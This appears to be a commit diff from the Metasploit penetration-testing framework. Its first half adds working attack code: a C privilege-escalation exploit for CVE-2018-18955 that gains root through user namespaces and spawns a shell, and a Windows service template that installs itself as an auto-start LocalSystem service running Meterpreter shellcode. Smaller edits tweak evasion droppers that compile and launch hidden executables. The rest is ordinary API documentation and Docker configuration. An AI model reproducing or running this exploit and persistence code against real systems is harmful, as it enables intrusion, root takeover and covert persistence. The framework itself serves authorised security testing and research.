+  va_start(args, what);
67
+  vsnprintf(buf, sizeof(buf), what, args);
68
+  va_end(args);
69
+  buf[sizeof(buf) - 1] = 0;
70
+  int len = strlen(buf);
71
+
72
+  int fd = open(file, O_WRONLY | O_CLOEXEC);
73
+  if (fd == -1)
74
+    return -1;
75
+  if (write(fd, buf, len) != len) {
76
+    close(fd);
77
+    return -1;
78
+  }
79
+  close(fd);
80
+  return 0;
81
+}
82
+
83
+
84
+// * * * * * * * * * * * * * * * * * Map * * * * * * * * * * * * * * * * *
85
+
86
+int get_subuid(char* output, int max_length) {
87
+  char buffer[1024];
88
+  char* path = "/etc/subuid";
89
+  int length = read_file(path, &buffer[0], sizeof(buffer));
90
+  if (length == -1)
91
+    return -1;
92
+
93
+  int real_uid = getuid();
94
+  struct passwd *u = getpwuid(real_uid);
95
+
96
+  char needle[1024];
97
+  sprintf(needle, "%s:", u->pw_name);
98
+  int needle_length = strlen(needle);
99
+  char* found = memmem(&buffer[0], length, needle, needle_length);
100
+  if (found == NULL)
101
+    return -1;
102
+
103
+  int i;
104
+  for (i = 0; found[needle_length + i] != ':'; i++) {
105
+    if (i >= max_length)
106
+      return -1;
107
+    if ((found - &buffer[0]) + needle_length + i >= length)
108
+      return -1;
109
+    output[i] = found[needle_length + i];
110
+  }
111
+
112
+  return 0;
113
+}
114
+
115
+int get_subgid(char* output, int max_length) {
116
+  char buffer[1024];
117
+  char* path = "/etc/subgid";
118
+  int length = read_file(path, &buffer[0], sizeof(buffer));
119
+  if (length == -1)
120
+    return -1;
121
+
122
+  int real_gid = getgid();
123
+  struct group *g = getgrgid(real_gid);
124
+
125
+  char needle[1024];
126
+  sprintf(needle, "%s:", g->gr_name);
127
+  int needle_length = strlen(needle);
128
+  char* found = memmem(&buffer[0], length, needle, needle_length);
129
+  if (found == NULL)
130
+    return -1;
131
+
132
+  int i;
133
+  for (i = 0; found[needle_length + i] != ':'; i++) {
134
+    if (i >= max_length)
135
+      return -1;
136
+    if ((found - &buffer[0]) + needle_length + i >= length)
137
+      return -1;
138
+    output[i] = found[needle_length + i];
139
+  }
140
+
141
+  return 0;
142
+}
143
+
144
+
145
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
146
+
147
+int main(int argc, char** argv) {
148
+  if (argc > 1) SUBSHELL = argv[1];
149
+
150
+  dprintf("[.] starting\n");
151
+
152
+  dprintf("[.] setting up namespace\n");
153
+
154
+  int sync_pipe[2];
155
+  char dummy;
156
+
157
+  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) {
158
+    dprintf("[-] pipe\n");
159
+    exit(EXIT_FAILURE);
160
+  }
161
+
162
+  pid_t child = fork();
163
+
164
+  if (child == -1) {
165
+    dprintf("[-] fork");
166
+    exit(EXIT_FAILURE);
167
+  }
168
+
169
+  if (child == 0) {
170
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
171
+    close(sync_pipe[1]);
172
+
173
+    if (unshare(CLONE_NEWUSER) != 0) {
174
+      dprintf("[-] unshare(CLONE_NEWUSER)\n");
175
+      exit(EXIT_FAILURE);
176
+    }
177
+
178
+    if (unshare(CLONE_NEWNET) != 0) {
179
+      dprintf("[-] unshare(CLONE_NEWNET)\n");
180
+      exit(EXIT_FAILURE);
181
+    }
182
+
183
+    if (write(sync_pipe[0], "X", 1) != 1) {
184
+      dprintf("write to sock\n");
185
+      exit(EXIT_FAILURE);
186
+    }
187
+
188
+    if (read(sync_pipe[0], &dummy, 1) != 1) {
189
+      dprintf("[-] read from sock\n");
190
+      exit(EXIT_FAILURE);
191
+    }
192
+
193
+    if (setgid(0)) {
194
+      dprintf("[-] setgid");
195
+      exit(EXIT_FAILURE);
196
+    }
197
+
198
+    if (setuid(0)) {
199
+      printf("[-] setuid");
200
+      exit(EXIT_FAILURE);
201
+    }
202
+
203
+    execl(SUBSHELL, "", NULL);
204
+
205
+    dprintf("[-] executing subshell failed\n");
206
+  }
207
+
208
+  close(sync_pipe[0]);
209
+
210
+  if (read(sync_pipe[1], &dummy, 1) != 1) {
211
+    dprintf("[-] read from sock\n");
212
+    exit(EXIT_FAILURE);
213
+  }
214
+
215
+  char path[256];
216
+  sprintf(path, "/proc/%d/setgroups", (int)child);
217
+
218
+  if (write_file(path, "deny") == -1) {
219
+    dprintf("[-] denying setgroups failed\n");
220
+    exit(EXIT_FAILURE);
221
+  }
222
+
223
+  dprintf("[~] done, namespace sandbox set up\n");
224
+
225
+  dprintf("[.] mapping subordinate ids\n");
226
+  char subuid[64];
227
+  char subgid[64];
228
+
229
+  if (get_subuid(&subuid[0], sizeof(subuid))) {
230
+    dprintf("[-] couldn't find subuid map in /etc/subuid\n");
231
+    exit(EXIT_FAILURE);
232
+  }
233
+
234
+  if (get_subgid(&subgid[0], sizeof(subgid))) {
235
+    dprintf("[-] couldn't find subgid map in /etc/subgid\n");
236
+    exit(EXIT_FAILURE);
237
+  }
238
+
239
+  dprintf("[.] subuid: %s\n", subuid);
240
+  dprintf("[.] subgid: %s\n", subgid);
241
+
242
+  char cmd[256];
243
+
244
+  sprintf(cmd, "newuidmap %d 0 %s 1000", (int)child, subuid);
245
+  if (system(cmd))  {
246
+    dprintf("[-] newuidmap failed");
247
+    exit(EXIT_FAILURE);
248
+  }
249
+
250
+  sprintf(cmd, "newgidmap %d 0 %s 1000", (int)child, subgid);
251
+  if (system(cmd)) {
252
+    dprintf("[-] newgidmap failed");
253
+    exit(EXIT_FAILURE);
254
+  }
255
+
256
+  dprintf("[~] done, mapped subordinate ids\n");
257
+
258
+  dprintf("[.] executing subshell\n");
259
+
260
+  if (write(sync_pipe[1], "X", 1) != 1) {
261
+    dprintf("[-] write to sock");
262
+    exit(EXIT_FAILURE);
263
+  }
264
+
265
+  int status;
266
+  if (wait(&status) != child) {
267
+    dprintf("[-] wait");
268
+    exit(EXIT_FAILURE);
269
+  }
270
+
271
+  return 0;
272
+}

BIN
data/exploits/cve-2018-18955/subuid_shell.out View File


+ 2
- 1
data/exploits/evasion_shellcode.js View File

@@ -72,5 +72,6 @@ function ShellCodeExec()
72 72
   WaitForSingleObject(hThread, 0xFFFFFFFF);
73 73
 
74 74
 }
75
-
75
+try{
76 76
 ShellCodeExec();
77
+}catch(e){}

+ 2
- 1
data/exploits/hta_evasion.hta View File

@@ -141,8 +141,9 @@
141 141
     var objShell = new ActiveXObject("WScript.shell");
142 142
     var js_f = path + "\\\\<%= fname %>.js";
143 143
     var ex = path + "\\\\<%= fname %>.exe";
144
+    var platform = "/platform:<%= arch %>";
144 145
 
145
-    objShell.run(comPath + " /out:" + ex + " " + js_f);
146
+    objShell.run(comPath + " /out:" + ex + " " + platform + " /t:winexe "+ js_f, 0);
146 147
     while(!fso.FileExists(ex)) { }
147 148
     
148 149
     objShell.run(ex, 0);

BIN
data/exploits/juicypotato/juicypotato.x64.dll View File


BIN
data/exploits/juicypotato/juicypotato.x86.dll View File


+ 304
- 0
data/exploits/persistence_service/service.erb View File

@@ -0,0 +1,304 @@
1
+#include <String.h>
2
+#include <Windows.h>
3
+#include <stdlib.h>
4
+#include <stdio.h>
5
+
6
+#define SERVICE_NAME     <%= @service_name.inspect %>
7
+#define DISPLAY_NAME     <%= @service_description.inspect %>
8
+#define RETRY_TIME       <%= @retry_time %>
9
+
10
+//
11
+// Globals
12
+//
13
+
14
+SERVICE_STATUS status;
15
+SERVICE_STATUS_HANDLE hStatus;
16
+
17
+//
18
+// Meterpreter connect back to host
19
+//
20
+
21
+void start_meterpreter()
22
+{
23
+// Your meterpreter shell here
24
+  <%= buf %>
25
+
26
+  LPVOID buffer = (LPVOID)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
27
+  memcpy(buffer,buf,sizeof(buf));
28
+  HANDLE hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)(buffer),NULL,0,NULL);
29
+  WaitForSingleObject(hThread, -1); //INFINITE
30
+  CloseHandle(hThread);
31
+}
32
+
33
+//
34
+// Call self without parameter to start meterpreter
35
+//
36
+
37
+void self_call()
38
+{
39
+    char path[MAX_PATH];
40
+    char cmd[MAX_PATH];
41
+
42
+    if (GetModuleFileName(NULL, path, sizeof(path)) == 0) {
43
+        // Get module file name failed
44
+        return;
45
+    }
46
+
47
+    STARTUPINFO startup_info;
48
+    PROCESS_INFORMATION process_information;
49
+
50
+    ZeroMemory(&startup_info, sizeof(startup_info));
51
+    startup_info.cb = sizeof(startup_info);
52
+
53
+    ZeroMemory(&process_information, sizeof(process_information));
54
+
55
+    // If create process failed.
56
+    // CREATE_NO_WINDOW = 0x08000000
57
+    if (CreateProcess(path, path, NULL, NULL, TRUE, 0x08000000, NULL,
58
+                      NULL, &startup_info, &process_information) == 0)
59
+    {
60
+        return;
61
+    }
62
+
63
+    // Wait until the process died.
64
+    WaitForSingleObject(process_information.hProcess, -1);
65
+}
66
+
67
+//
68
+// Process control requests from the Service Control Manager
69
+//
70
+
71
+VOID WINAPI ServiceCtrlHandler(DWORD fdwControl)
72
+{
73
+    switch (fdwControl) {
74
+        case SERVICE_CONTROL_STOP:
75
+        case SERVICE_CONTROL_SHUTDOWN:
76
+            status.dwWin32ExitCode = 0;
77
+            status.dwCurrentState = SERVICE_STOPPED;
78
+            break;
79
+
80
+        case SERVICE_CONTROL_PAUSE:
81
+            status.dwWin32ExitCode = 0;
82
+            status.dwCurrentState = SERVICE_PAUSED;
83
+            break;
84
+
85
+        case SERVICE_CONTROL_CONTINUE:
86
+            status.dwWin32ExitCode = 0;
87
+            status.dwCurrentState = SERVICE_RUNNING;
88
+            break;
89
+
90
+        default:
91
+            break;
92
+    }
93
+
94
+    if (SetServiceStatus(hStatus, &status) == 0) {
95
+        //printf("Cannot set service status (0x%08x)", GetLastError());
96
+        exit(1);
97
+    }
98
+
99
+    return;
100
+}
101
+
102
+
103
+//
104
+// Main function of service
105
+//
106
+
107
+VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR* lpszArgv)
108
+{
109
+    // Register the service handler
110
+
111
+    hStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler);
112
+
113
+    if (hStatus == 0) {
114
+        //printf("Cannot register service handler (0x%08x)", GetLastError());
115
+        exit(1);
116
+    }
117
+
118
+    // Initialize the service status structure
119
+
120
+    status.dwServiceType = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS;
121
+    status.dwCurrentState = SERVICE_RUNNING;
122
+    status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
123
+    status.dwWin32ExitCode = 0;
124
+    status.dwServiceSpecificExitCode = 0;
125
+    status.dwCheckPoint = 0;
126
+    status.dwWaitHint = 0;
127
+
128
+    if (SetServiceStatus(hStatus, &status) == 0) {
129
+        //printf("Cannot set service status (0x%08x)", GetLastError());
130
+        return;
131
+    }
132
+
133
+    // Start the Meterpreter
134
+    while (status.dwCurrentState == SERVICE_RUNNING) {
135
+        self_call();
136
+        Sleep(RETRY_TIME);
137
+    }
138
+
139
+    return;
140
+}
141
+
142
+
143
+//
144
+// Installs and starts the Meterpreter service
145
+//
146
+
147
+BOOL install_service()
148
+{
149
+    SC_HANDLE hSCManager;
150
+    SC_HANDLE hService;
151
+
152
+    char path[MAX_PATH];
153
+
154
+    // Get the current module name
155
+
156
+    if (!GetModuleFileName(NULL, path, MAX_PATH)) {
157
+        //printf("Cannot get module name (0x%08x)", GetLastError());
158
+        return FALSE;
159
+    }
160
+
161
+    // Build the service command line
162
+
163
+
164
+    char cmd[MAX_PATH];
165
+
166
+    int total_len = strlen(path) + <%= 3 + @start_cmd.length %>;
167
+    if (total_len < 0 || total_len >= sizeof(cmd)){
168
+        //printf("Cannot build service command line (0x%08x)", -1);
169
+        return FALSE;
170
+    }
171
+
172
+    cmd[0] = '\0';
173
+    strcat(cmd, "\"");
174
+    strcat(cmd, path);
175
+    strcat(cmd, "\" <%= @start_cmd %>");
176
+
177
+    // Open the service manager
178
+
179
+    hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
180
+
181
+    if (hSCManager == NULL) {
182
+        //printf("Cannot open service manager (0x%08x)", GetLastError());
183
+        return FALSE;
184
+    }
185
+
186
+    // Create the service
187
+
188
+    hService = CreateService(
189
+        hSCManager,
190
+        SERVICE_NAME,
191
+        DISPLAY_NAME,
192
+        0xf01ff,            // SERVICE_ALL_ACCESS
193
+        SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
194
+        SERVICE_AUTO_START,
195
+        SERVICE_ERROR_NORMAL,
196
+        cmd,
197
+        NULL,
198
+        NULL,
199
+        NULL,
200
+        NULL,   /* LocalSystem account */
201
+        NULL
202
+    );
203
+
204
+    if (hService == NULL) {
205
+        //printf("Cannot create service (0x%08x)", GetLastError());
206
+
207
+        CloseServiceHandle(hSCManager);
208
+        return FALSE;
209
+    }
210
+
211
+    // Start the service
212
+
213
+    char* args[] = { path, "service" };
214
+
215
+    if (StartService(hService, 2, (const char**)&args) == 0) {
216
+        DWORD err = GetLastError();
217
+
218
+        if (err != 0x420) //ERROR_SERVICE_ALREADY_RUNNING
219
+        {
220
+            //printf("Cannot start service %s (0x%08x)", SERVICE_NAME, err);
221
+
222
+            CloseServiceHandle(hService);
223
+            CloseServiceHandle(hSCManager);
224
+            return FALSE;
225
+        }
226
+    }
227
+
228
+    // Cleanup
229
+
230
+    CloseServiceHandle(hService);
231
+    CloseServiceHandle(hSCManager);
232
+
233
+    //printf("Service %s successfully installed.", SERVICE_NAME);
234
+
235
+    return TRUE;
236
+}
237
+
238
+//
239
+// Start the service
240
+//
241
+
242
+void start_service()
243
+{
244
+    SERVICE_TABLE_ENTRY ServiceTable[] =
245
+    {
246
+        { SERVICE_NAME, &ServiceMain },
247
+        { NULL, NULL }
248
+    };
249
+
250
+    if (StartServiceCtrlDispatcher(ServiceTable) == 0) {
251
+        //printf("Cannot start the service control dispatcher (0x%08x)",GetLastError());
252
+        exit(1);
253
+    }
254
+}
255
+
256
+
257
+//
258
+// Main function
259
+//
260
+
261
+int main()
262
+{
263
+    // Parse the command line argument.
264
+    // For now, int main(int argc, char *argv) is buggy with metasm.
265
+    // So we choose this approach to achieve it.
266
+    LPTSTR cmdline;
267
+    cmdline = GetCommandLine();
268
+
269
+    char *argv[MAX_PATH];
270
+    char * ch = strtok(cmdline," ");
271
+    int argc = 0;
272
+
273
+    while (ch != NULL)
274
+    {
275
+       argv[argc] = malloc( strlen(ch)+1) ;
276
+       strncpy(argv[argc], ch, strlen(ch)+1);
277
+
278
+       ch = strtok (NULL, " ");
279
+       argc++;
280
+    }
281
+
282
+    if (argc > 1) {
283
+
284
+        if (strcmp(argv[argc-1], <%= @install_cmd.inspect %>) == 0) {
285
+
286
+            // Installs and starts the service
287
+
288
+            install_service();
289
+            return 0;
290
+        }
291
+        else if (strcmp(argv[argc-1], <%= @start_cmd.inspect %>) == 0) {
292
+            // Starts the Meterpreter as a service
293
+
294
+            start_service();
295
+            return 0;
296
+        }
297
+    }
298
+
299
+    // Starts the Meterpreter as a normal application
300
+
301
+    start_meterpreter();
302
+
303
+    return 0;
304
+}

+ 13
- 0
data/headers/windows/Windows.h View File

@@ -252,6 +252,16 @@ typedef struct _OVERLAPPED {
252 252
 } OVERLAPPED, *LPOVERLAPPED;
253 253
 
254 254
 typedef DWORD SERVICE_STATUS_HANDLE;
255
+typedef VOID(WINAPI *LPHANDLER_FUNCTION)(DWORD);
256
+
257
+typedef void (WINAPI *LPSERVICE_MAIN_FUNCTION)(DWORD,LPSTR*);
258
+
259
+typedef struct _SERVICE_TABLE_ENTRY {
260
+	LPSTR lpServiceName;
261
+	LPSERVICE_MAIN_FUNCTION lpServiceProc;
262
+} SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
263
+
264
+typedef SERVICE_TABLE_ENTRY SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
255 265
 
256 266
 typedef enum _SC_ENUM_TYPE {
257 267
         SC_ENUM_PROCESS_INFO = 0
@@ -540,3 +550,6 @@ WINAPI BOOL IsDebuggerPresent __attribute__((dllimport))(void);
540 550
 WINAPI BOOL CheckRemoteDebuggerPresent __attribute__((dllimport))(HANDLE, PBOOL);
541 551
 WINAPI NTSTATUS NtQueryInformationProcess __attribute__((dllimport))(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
542 552
 WINAPI void SetLastError __attribute__((dllimport))(DWORD);
553
+WINAPI SERVICE_STATUS_HANDLE RegisterServiceCtrlHandler __attribute__((dllimport))(LPCSTR, LPHANDLER_FUNCTION);
554
+BOOL WINAPI StartServiceCtrlDispatcher __attribute__((dllimport))(LPSERVICE_TABLE_ENTRY);
555
+LPTSTR WINAPI GetCommandLine __attribute__((dllimport))(void);

+ 2
- 0
data/headers/windows/stdlib.h View File

@@ -44,3 +44,5 @@ int system(const char*);
44 44
 long int labs(long int);
45 45
 div_t div(int, int);
46 46
 ldiv_t ldiv(long int, long int);
47
+void* malloc (size_t size);
48
+

data/logos/under-construction-v5.txt → data/logos/metasploit-v5.txt View File

@@ -22,4 +22,4 @@ xMMMMMMMMMd                        ,0MMMMMMMMMMK;
22 22
 %red           'oOWMMMMMMMMo%clr                +:+
23 23
 %red               .,cdkO0K;%clr        :+:    :+:                                
24 24
                                 :::::::+:
25
-           %whiMetasploit%clr %yelUnder Construction%clr
25
+                      %whiMetasploit%clr

BIN
data/meterpreter/x64_osx_stage View File


+ 919
- 2
data/wordlists/joomla.txt
File diff suppressed because it is too large
View File


+ 1
- 0
data/wordlists/unix_users.txt View File

@@ -16,6 +16,7 @@ bin
16 16
 checkfs
17 17
 checkfsys
18 18
 checksys
19
+chronos
19 20
 cmwlogin
20 21
 couchdb
21 22
 daemon

+ 1
- 0
data/ysoserial_payloads.json
File diff suppressed because it is too large
View File


+ 3583
- 483
db/modules_metadata_base.json
File diff suppressed because it is too large
View File


+ 1
- 1
docker-compose.override.yml View File

@@ -9,6 +9,6 @@ services:
9 9
         BUNDLER_ARGS: --jobs=8
10 10
     image: metasploit:dev
11 11
     environment:
12
-      DATABASE_URL: postgres://postgres@db:5432/msf_dev
12
+      DATABASE_URL: postgres://postgres@db:5432/msf_dev?pool=200&timeout=5
13 13
     volumes:
14 14
       - .:/usr/src/metasploit-framework

+ 1
- 2
docker-compose.yml View File

@@ -3,14 +3,13 @@ services:
3 3
   ms:
4 4
     image: metasploitframework/metasploit-framework:latest
5 5
     environment:
6
-      DATABASE_URL: postgres://postgres@db:5432/msf
6
+      DATABASE_URL: postgres://postgres@db:5432/msf?pool=200&timeout=5
7 7
     links:
8 8
       - db
9 9
     ports:
10 10
       - 4444:4444
11 11
     volumes:
12 12
       - $HOME/.msf4:/home/msf/.msf4
13
-      - /etc/localtime:/etc/localtime:ro
14 13
 
15 14
   db:
16 15
     image: postgres:10-alpine

+ 5
- 0
docker/database.yml View File

@@ -0,0 +1,5 @@
1
+development: &pgsql
2
+  url: <%= ENV['DATABASE_URL'] %>
3
+
4
+production: &production
5
+  <<: *pgsql

+ 22
- 11
docker/entrypoint.sh View File

@@ -5,16 +5,27 @@ MSF_GROUP=msf
5 5
 TMP=${MSF_UID:=1000}
6 6
 TMP=${MSF_GID:=1000}
7 7
 
8
-# don't recreate system users like root
9
-if [ "$MSF_UID" -lt "1000" ]; then
10
-  MSF_UID=1000
11
-fi
8
+# if the user starts the container as root or another system user,
9
+# don't use a low privileged user as we mount the home directory
10
+if [ "$MSF_UID" -eq "0" ]; then
11
+  "$@"
12
+else
13
+  # if the users group already exists, create a random GID, otherwise
14
+  # reuse it
15
+  if ! grep ":$MSF_GID:" /etc/group > /dev/null; then
16
+    addgroup -g $MSF_GID $MSF_GROUP
17
+  else
18
+    addgroup $MSF_GROUP
19
+  fi
12 20
 
13
-if [ "$MSF_GID" -lt "1000" ]; then
14
-  MSF_GID=1000
21
+  # check if user id already exists
22
+  if ! grep ":$MSF_UID:" /etc/passwd > /dev/null; then
23
+    adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
24
+    # add user to metasploit group so it can read the source
25
+    addgroup $MSF_USER $METASPLOIT_GROUP
26
+    su-exec $MSF_USER "$@"
27
+  # fall back to root exec if the user id already exists
28
+  else
29
+    "$@"
30
+  fi
15 31
 fi
16
-
17
-addgroup -g $MSF_GID $MSF_GROUP
18
-adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
19
-
20
-su-exec $MSF_USER "$@"

+ 9
- 14
documentation/api/v1/auth_api_doc.rb View File

@@ -15,26 +15,21 @@ module AuthApiDoc
15 15
   end
16 16
 
17 17
   swagger_path '/api/v1/auth/generate-token' do
18
-    # Swagger documentation for /api/v1/auth/generate-token GET
19
-    operation :get do
18
+    # Swagger documentation for /api/v1/auth/generate-token POST
19
+    operation :post do
20 20
 
21 21
       key :description, 'Return a valid Authorization Bearer token.'
22 22
       key :tags, [ 'auth' ]
23 23
 
24 24
       parameter do
25
-        key :name, :username
26
-        key :in, :query
27
-        key :description, 'The username for the user you want to authenticate.'
25
+        key :in, :body
26
+        key :name, :body
27
+        key :description, 'Login credentials for the user who will be generating a token.'
28 28
         key :required, true
29
-        key :type, :string
30
-      end
31
-
32
-      parameter do
33
-        key :name, :password
34
-        key :in, :query
35
-        key :description, 'The password for the user you want to authenticate.'
36
-        key :required, true
37
-        key :type, :string
29
+        schema do
30
+          property :username, type: :string, required: true
31
+          property :password, type: :string, required: true
32
+        end
38 33
       end
39 34
 
40 35
       response 200 do

+ 17
- 1
documentation/api/v1/credential_api_doc.rb View File

@@ -33,6 +33,11 @@ module CredentialApiDoc
33 33
   DATA_EXAMPLE = "'password123', '$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1', or '$NT$7f8fe03093cc84b267b109625f6bbf4b'"
34 34
   JTR_FORMAT_DESC = 'Comma-separated list of the formats for John the ripper to use to try and crack this.'
35 35
   JTR_FORMAT_EXAMPLE = 'md5,des,bsdi,crypt'
36
+  KEY_DESC = 'The name of the key for the realm.'
37
+  KEY_EXAMPLE = 'Active Directory Domain'
38
+  VALUE_DESC = 'The value of the key for the realm.'
39
+  VALUE_EXAMPLE = 'contoso.com'
40
+
36 41
   PUBLIC_TYPE_ENUM = [ 'Metasploit::Credential::BlankUsername', 'Metasploit::Credential::Username' ]
37 42
   PRIVATE_TYPE_CLASS_ENUM = [
38 43
       'Metasploit::Credential::ReplayableHash',
@@ -108,6 +113,15 @@ module CredentialApiDoc
108 113
     property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
109 114
   end
110 115
 
116
+  swagger_schema :Realm do
117
+    key :required, [:key, :value]
118
+    property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
119
+    property :key, type: :string, description: KEY_DESC, example: KEY_EXAMPLE
120
+    property :value, type: :string, description: VALUE_DESC, example: VALUE_EXAMPLE
121
+    property :created_at, type: :string, format: :date_time, description: RootApiDoc::CREATED_AT_DESC
122
+    property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
123
+  end
124
+
111 125
   swagger_path '/api/v1/credentials' do
112 126
     # Swagger documentation for /api/v1/credentials GET
113 127
     operation :get do
@@ -197,6 +211,8 @@ module CredentialApiDoc
197 211
           property :username, type: :string, description: USERNAME_DESC, example: USERNAME_EXAMPLE
198 212
           property :private_data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
199 213
           property :private_type, type: :string, description: PRIVATE_TYPE_DESC, enum: PRIVATE_TYPE_ENUM
214
+          property :realm_key, type: :string, description: KEY_DESC, enum: PRIVATE_TYPE_ENUM
215
+          property :realm_value, type: :string, description: VALUE_DESC, enum: PRIVATE_TYPE_ENUM
200 216
           property :jtr_format, type: :string, description: JTR_FORMAT_DESC, example: JTR_FORMAT_EXAMPLE
201 217
           property :address, type: :string, format: :ipv4, required: true, description: ADDRESS_DESC, example: ADDRESS_EXAMPLE
202 218
           property :port, type: :int32, format: :int32, description: PORT_DESC, example: PORT_EXAMPLE
@@ -312,7 +328,7 @@ module CredentialApiDoc
312 328
 
313 329
     #Swagger documentation for /api/v1/credentials/:id PUT
314 330
     operation :put do
315
-      key :description, 'Update the attributes an existing credential.'
331
+      key :description, 'Update the attributes on an existing credential.'
316 332
       key :tags, [ 'credential' ]
317 333
 
318 334
       parameter :update_id

+ 104
- 1
documentation/api/v1/event_api_doc.rb View File

@@ -10,7 +10,7 @@ module EventApiDoc
10 10
   SEEN_DESC = 'true if a user has acknowledged the event.'
11 11
   USERNAME_DESC = 'Name of the user that triggered the event.'
12 12
   INFO_DESC = 'Information about the event specific to the event name.'
13
-  INFO_EXAMPLE = '{:command=>"irb"}'
13
+  INFO_EXAMPLE = {command: 'irb'}
14 14
 
15 15
 # Swagger documentation for Event model
16 16
   swagger_schema :Event do
@@ -27,6 +27,69 @@ module EventApiDoc
27 27
   end
28 28
 
29 29
   swagger_path '/api/v1/events' do
30
+    # Swagger documentation for /api/v1/events GET
31
+    operation :get do
32
+      key :description, 'Return events that are stored in the database.'
33
+      key :tags, [ 'event' ]
34
+
35
+      parameter :workspace
36
+
37
+      parameter do
38
+        key :name, :limit
39
+        key :in, :query
40
+        key :description, RootApiDoc::LIMIT_DESC
41
+        key :example, RootApiDoc::LIMIT_DEFAULT
42
+        key :type, :integer
43
+        key :format, :int32
44
+        key :required, false
45
+      end
46
+
47
+      parameter do
48
+        key :name, :offset
49
+        key :in, :query
50
+        key :description, RootApiDoc::OFFSET_DESC
51
+        key :example, RootApiDoc::OFFSET_DEFAULT
52
+        key :type, :integer
53
+        key :format, :int32
54
+        key :required, false
55
+      end
56
+
57
+      parameter do
58
+        key :name, :order
59
+        key :in, :query
60
+        key :description, RootApiDoc::ORDER_DESC
61
+        key :type, :string
62
+        key :required, false
63
+        key :enum, RootApiDoc::ORDER_ENUM
64
+      end
65
+
66
+      response 200 do
67
+        key :description, 'Returns event data.'
68
+        schema do
69
+          property :data do
70
+            key :type, :array
71
+            items do
72
+              key :'$ref', :Event
73
+            end
74
+          end
75
+        end
76
+      end
77
+
78
+      response 401 do
79
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
80
+        schema do
81
+          key :'$ref', :AuthErrorModel
82
+        end
83
+      end
84
+
85
+      response 500 do
86
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
87
+        schema do
88
+          key :'$ref', :ErrorModel
89
+        end
90
+      end
91
+    end
92
+
30 93
     # Swagger documentation for /api/v1/events POST
31 94
     operation :post do
32 95
       key :description, 'Create an event.'
@@ -71,4 +134,44 @@ module EventApiDoc
71 134
       end
72 135
     end
73 136
   end
137
+
138
+  swagger_path '/api/v1/events/{id}' do
139
+    # Swagger documentation for /api/v1/events/:id GET
140
+    operation :get do
141
+      key :description, 'Return a specific event that is stored in the database.'
142
+      key :tags, [ 'event' ]
143
+
144
+      parameter do
145
+        key :name, :id
146
+        key :in, :path
147
+        key :description, 'ID of event to retrieve.'
148
+        key :required, true
149
+        key :type, :integer
150
+        key :format, :int32
151
+      end
152
+
153
+      response 200 do
154
+        key :description, 'Returns event data.'
155
+        schema do
156
+          property :data do
157
+            key :'$ref', :Event
158
+          end
159
+        end
160
+      end
161
+
162
+      response 401 do
163
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
164
+        schema do
165
+          key :'$ref', :AuthErrorModel
166
+        end
167
+      end
168
+
169
+      response 500 do
170
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
171
+        schema do
172
+          key :'$ref', :ErrorModel
173
+        end
174
+      end
175
+    end
176
+  end
74 177
 end

+ 1
- 1
documentation/api/v1/host_api_doc.rb View File

@@ -266,7 +266,7 @@ module HostApiDoc
266 266
 
267 267
     # Swagger documentation for /api/v1/hosts/:id PUT
268 268
     operation :put do
269
-      key :description, 'Update the attributes an existing host.'
269
+      key :description, 'Update the attributes on an existing host.'
270 270
       key :tags, [ 'host' ]
271 271
 
272 272
       parameter :update_id

+ 2
- 2
documentation/api/v1/login_api_doc.rb View File

@@ -153,7 +153,7 @@ module LoginApiDoc
153 153
   end
154 154
 
155 155
   swagger_path '/api/v1/logins/{id}' do
156
-    # Swagger documentation for api/v1/logins/:id GET
156
+    # Swagger documentation for /api/v1/logins/:id GET
157 157
     operation :get do
158 158
       key :description, 'Return specific login that is stored in the database.'
159 159
       key :tags, [ 'login' ]
@@ -193,7 +193,7 @@ module LoginApiDoc
193 193
 
194 194
     # Swagger documentation for /api/v1/logins/:id PUT
195 195
     operation :put do
196
-      key :description, 'Update the attributes an existing login.'
196
+      key :description, 'Update the attributes on an existing login.'
197 197
       key :tags, [ 'login' ]
198 198
 
199 199
       parameter :update_id

+ 17
- 6
documentation/api/v1/loot_api_doc.rb View File

@@ -10,7 +10,8 @@ module LootApiDoc
10 10
   LTYPE_EXAMPLE = "'file', 'image', 'config_file', etc."
11 11
   PATH_DESC = 'The on-disk path to the loot file.'
12 12
   PATH_EXAMPLE = '/path/to/file.txt'
13
-  DATA_DESC = 'The contents of the file.'
13
+  DATA_DESC = "Base64 encoded copy of the file's contents."
14
+  DATA_EXAMPLE = 'dGhpcyBpcyB0aGUgZmlsZSdzIGNvbnRlbnRz'
14 15
   CONTENT_TYPE_DESC = 'The mime/content type of the file at {#path}.  Used to server the file correctly so browsers understand whether to render or download the file.'
15 16
   CONTENT_TYPE_EXAMPLE = 'text/plain'
16 17
   NAME_DESC = 'The name of the loot.'
@@ -18,6 +19,9 @@ module LootApiDoc
18 19
   INFO_DESC = 'Information about the loot.'
19 20
   MODULE_RUN_ID_DESC = 'The ID of the module run record this loot is associated with.'
20 21
 
22
